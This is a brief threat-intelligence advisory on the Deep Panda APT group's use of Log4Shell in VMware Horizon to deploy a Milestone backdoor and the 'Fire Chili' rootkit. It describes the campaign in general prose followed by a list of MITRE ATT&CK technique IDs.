Deep Panda deploys new rootkit "Fire Chili" by exploiting Log4shell in VMware horizon

THREAT LEVEL: Red

For a detailed advisory, download the pdf file here

Deep Panda, a Chinese APT group, took advantage of the well-known Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor, rootkit, and steal sensitive data. This threat actor is primarily targeting firms in the finance, education, beauty, and tourist industries.

The attacks are carried out initially by exploiting Log4Shell (CVE-2021-44228) in the vulnerable VMware Horizon servers. These attacks launched a new PowerShell process that downloaded and executed a series of scripts, culminating in the installation of a Milestone backdoor. Milestone is intended to send information on the current system sessions to the remote server. During the attacks, a kernel rootkit called “Fire Chili” was discovered that was digitally signed with stolen certificates from game development companies, allowing it to avoid detection by security software.

The Mitre TTPs commonly used by Deep Panda are:

TA0042: Resource Development
TA0001: Initial Access
TA0002: Execution
TA0003: Persistence
TA0004: Privilege Escalation
TA0005: Defense Evasion
TA0007: Discovery
TA0009: Collection
TA0010: Exfiltration
TA0043: Reconnaissance
T1190: Exploit Public-Facing Application
T1041: Exfiltration Over C2 Channel
T1082: System Information Discovery
T1036: Masquerading
T1083: File and Directory Discovery
T1592: Gather Victim Host Information
T1014: Rootkit
T1620: Reflective Code Loading
T1113: Screen Capture
T1569.002: System Services: Service Execution
T1059.001: Command and Scripting Interpreter: PowerShell
T1027.002: Obfuscated Files or Information: Software Packing
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1588.003: Obtain Capabilities: Code Signing Certificates
T1574.002: Hijack Execution Flow: DLL Side-Loading